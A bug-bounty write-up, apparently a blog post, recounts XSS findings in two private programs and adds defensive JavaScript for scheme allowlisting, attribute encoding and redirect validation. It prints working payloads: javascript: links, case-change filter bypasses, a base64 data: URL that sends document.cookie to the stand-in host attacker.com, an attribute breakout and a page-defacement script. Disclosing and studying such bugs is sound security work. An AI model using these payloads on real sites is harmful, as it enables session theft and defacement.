Hi, it's been a long time since I did a write-up, so this post is all about the XSS I found in two different private programs. Let's get started.

So the 1st program had a feature like this:


where we can put in some HTML and try for XSS. I tried different methods and pretty much every event handler to get XSS, but the program was checking everything properly and stripping anything that started with the on keyword.

So one thing came to mind: let's try the XSS through links. The next payload was
<a href="javascript:alert(1)">xD</a>
and boom, XSS popup. This is the compose area where we write a post and then publish it so other users can see it, so anyone who clicks the link gets the XSS popup.


I reported the issue to the program and they fixed it quickly. Afterwards I was trying to bypass the filter and noticed that they were checking for javascript: in the href; if it was there, they escaped it. So I tried different methods like URL encoding and &colon; instead of :, but none of them worked. Then I did some googling and found a payload:
<a href="data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pO3dpbmRvdy5sb2NhdGlvbj0naHR0cHM6Ly9hdHRhY2tlci5jb20vJytkb2N1bWVudC5jb29raWU8L3NjcmlwdD4=">test</a>
(The base64 decodes to a script that alerts document.domain and then navigates to https://attacker.com/ with document.cookie appended. Two caveats if you retry this today: modern browsers block a link from navigating the top-level page to a data: URL, and a data: document has an opaque origin, so the cookie it reads is not the target site's. The filter bypass itself is still the finding.)

So I used this payload and it worked, and I was able to steal the user's cookie with it. I reported this to the program again and they fixed it. Then I checked once more: they had applied the same fix as for the javascript: one, and now they were checking for both data: and javascript:. So I was trying to bypass that and didn't expect the bypass to be so easy. I figured the program was doing a plain, case-sensitive string match for those prefixes,

so if we just make any letter in the payload uppercase it gets through. I tried it and boom, it worked, and the same trick worked with data:. I reported this to the program and got $500 for all 4 XSS.
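To make the bypass concrete, here is an added example (not the program's code, which was never visible to the author): a blocklist filter modelled on the behaviour the post describes, beside a scheme allowlist built on the WHATWG URL parser. The naive version is an assumption about how the filter behaved; the probe inputs are constructed. It goes a bit beyond the post by also covering the leading-tab and embedded-newline variants, which defeat a plain string match the same way the case change does.

```javascript
// Added example, not the program's code. The naive filter below only models the
// behaviour the write-up describes (a case-sensitive prefix blocklist); the real
// filter was not visible to the author.

// Vulnerable: case-sensitive blocklist on the raw string.
function naiveHrefFilter(href) {
  for (const scheme of ["javascript:", "data:"]) {
    if (href.startsWith(scheme)) return "#"; // neutralise the link
  }
  return href;
}

// Hardened: parse with the WHATWG URL parser, which lowercases the scheme,
// strips leading/trailing control characters and spaces, and removes embedded
// tabs and newlines. Then allow only a short list of schemes. Relative links
// resolve against `base` (an assumed site origin for the demo).
function safeHref(href, base = "https://example.com/") {
  let url;
  try {
    url = new URL(href, base);
  } catch {
    return "#"; // unparseable input is never worth keeping
  }
  const allowed = new Set(["http:", "https:", "mailto:"]);
  return allowed.has(url.protocol) ? url.href : "#";
}

// Constructed probe inputs: the payloads from the write-up, the case variant
// that bypassed the fix, and whitespace variants that bypass it the same way.
const probes = [
  "javascript:alert(1)",
  "JaVaScRiPt:alert(1)",
  "Data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==",
  "\tjavascript:alert(1)",
  "java\nscript:alert(1)",
  "https://example.com/posts/42",
  "/posts/42",
];

// For each probe, what the naive filter let through and what the hardened
// filter produced. A "naive" value still starting with a dangerous scheme
// (in any case) is a bypass.
function compareFilters(inputs = probes) {
  return inputs.map((href) => ({
    href,
    naive: naiveHrefFilter(href),
    safe: safeHref(href),
  }));
}

for (const row of compareFilters()) {
  console.log(JSON.stringify(row));
}
```

The point is not the particular allowlist but the order of operations: normalise first (let the URL parser do it, since it already implements the browser's own rules), then compare against what is permitted. A blocklist compared against the raw string will always have one more spelling to miss.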

So the 2nd program had a URL like this:
https://PRIVATE.com/?url=[URL]
It's a download link which is rendered in the web page.


If you click on **Click here if the download doesn't start in several seconds.** it takes you to the URL in the url param. So I changed it to javascript:alert(1), and also used the data: payload here, and it worked on the 1st attempt :D


The url param lands in href="[URL]", so I tried to inject another attribute to break out of href="" and that was being checked properly. Then by mistake I entered "</><h1>ss</h1> and boom, HTML injected.


So after that I tried to do something more with this. What about a defacement :D
My next payload was

"</><script> document.getElementsByTagName("body")[0].innerHTML = "<h1 style='font-size:113px;'><br>Inside The B0x!!</h1>";</script>

The payload first grabs the <body> tag and replaces its entire HTML with <h1 style='font-size:113px;'><br>Inside The B0x!!</h1>
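The root cause here is the url param being interpolated straight into a double-quoted attribute, so a single " closes href and everything after it is parsed as markup. Below is an added example (not the program's code) of that vulnerable pattern beside an attribute-encoded version, exercised with the two payloads from the write-up; the link text is copied from the page, the rest is constructed for the demo.

```javascript
// Added example, not the program's code: raw interpolation into href="..."
// (the pattern the write-up describes) beside the attribute-encoded version.

const LINK_TEXT = "Click here if the download doesn't start in several seconds.";

// Vulnerable: the url parameter is dropped straight into the attribute, so a
// single double quote closes href and the rest is parsed as markup.
function renderLinkUnsafe(url) {
  return `<a href="${url}">${LINK_TEXT}</a>`;
}

// Encode the five characters that matter inside a double-quoted attribute
// (and in text nodes). & goes first so earlier output is not re-encoded.
function encodeAttr(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;");
}

// Hardened: the value can no longer terminate the attribute or open a tag.
function renderLinkSafe(url) {
  return `<a href="${encodeAttr(url)}">${LINK_TEXT}</a>`;
}

// The two payloads from the write-up, as constructed test inputs.
const breakout = '"</><h1>ss</h1>';
const deface =
  '"</><script> document.getElementsByTagName("body")[0].innerHTML = ' +
  '"<h1 style=\'font-size:113px;\'><br>Inside The B0x!!</h1>";</script>';

// Crude but sufficient check for this demo: count opening tags in the output.
// A correctly rendered link contains exactly one (<a ...>).
function countTags(html) {
  return (html.match(/<[a-zA-Z]/g) || []).length;
}

for (const payload of [breakout, deface]) {
  console.log("unsafe tags:", countTags(renderLinkUnsafe(payload)));
  console.log("safe   tags:", countTags(renderLinkSafe(payload)));
  console.log(renderLinkSafe(payload));
}
```

Attribute encoding and scheme validation are independent controls. Encoding alone still lets javascript:alert(1) through as a perfectly well-formed href (that was the program's first bug), and a scheme check alone does nothing about the " breakout (the second). A safe link renderer needs both.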


And the 2nd XSS on that program is at this URL:
https://PRIVATE.com/account/login?redirectURL=PRIVATE/accoun/edit-profile

If a user enters valid credentials, it redirects to the URL given in the redirectURL param. So I just tried the luckiest payload, javascript:alert(1). Bo0m:

https://PRIVATE.com/account/login?redirectURL=javascript:alert(1)

Now when a user enters their credentials, the XSS pops up.
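A post-login redirect target deserves a stricter rule than a user-authored link: it should never leave the site at all, which rules out javascript: and data: as a side effect. Here is an added example (not the program's code) of that check; the site origin is an assumption for the demo, and the inputs are constructed.

```javascript
// Added example, not the program's code: validating a post-login redirectURL
// so that only same-origin https targets are followed.

const SITE_ORIGIN = "https://example.com"; // assumed for the demo

// Returns an absolute same-origin URL to redirect to, or the fallback.
function safeRedirect(target, fallback = SITE_ORIGIN + "/account") {
  if (typeof target !== "string" || target === "") return fallback;
  let url;
  try {
    // Relative paths resolve against the site; absolute URLs keep their own origin.
    url = new URL(target, SITE_ORIGIN + "/");
  } catch {
    return fallback;
  }
  // javascript: and data: URLs have an opaque origin ("null"), and
  // protocol-relative //evil.example or https://example.com@evil.example
  // resolve to a different host, so one comparison rejects all of them.
  if (url.origin !== SITE_ORIGIN) return fallback;
  return url.href;
}

// Constructed inputs: the write-up's payload, the legitimate path from the
// original URL, and a few lookalikes a redirect validator must also reject.
const redirectProbes = [
  "javascript:alert(1)",
  "/account/edit-profile",
  "//evil.example/",
  "https://example.com@evil.example/",
  "https://example.com.evil.example/",
  "https://example.com/x?y=1",
];

for (const t of redirectProbes) {
  console.log(JSON.stringify(t), "->", safeRedirect(t));
}
```

Comparing url.origin rather than checking that the string starts with the site's hostname is what makes the lookalike cases fall out correctly; the parser has already decided what the host really is.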


Hope you guys like it, and sorry for my bad English :P

./Logout ;)
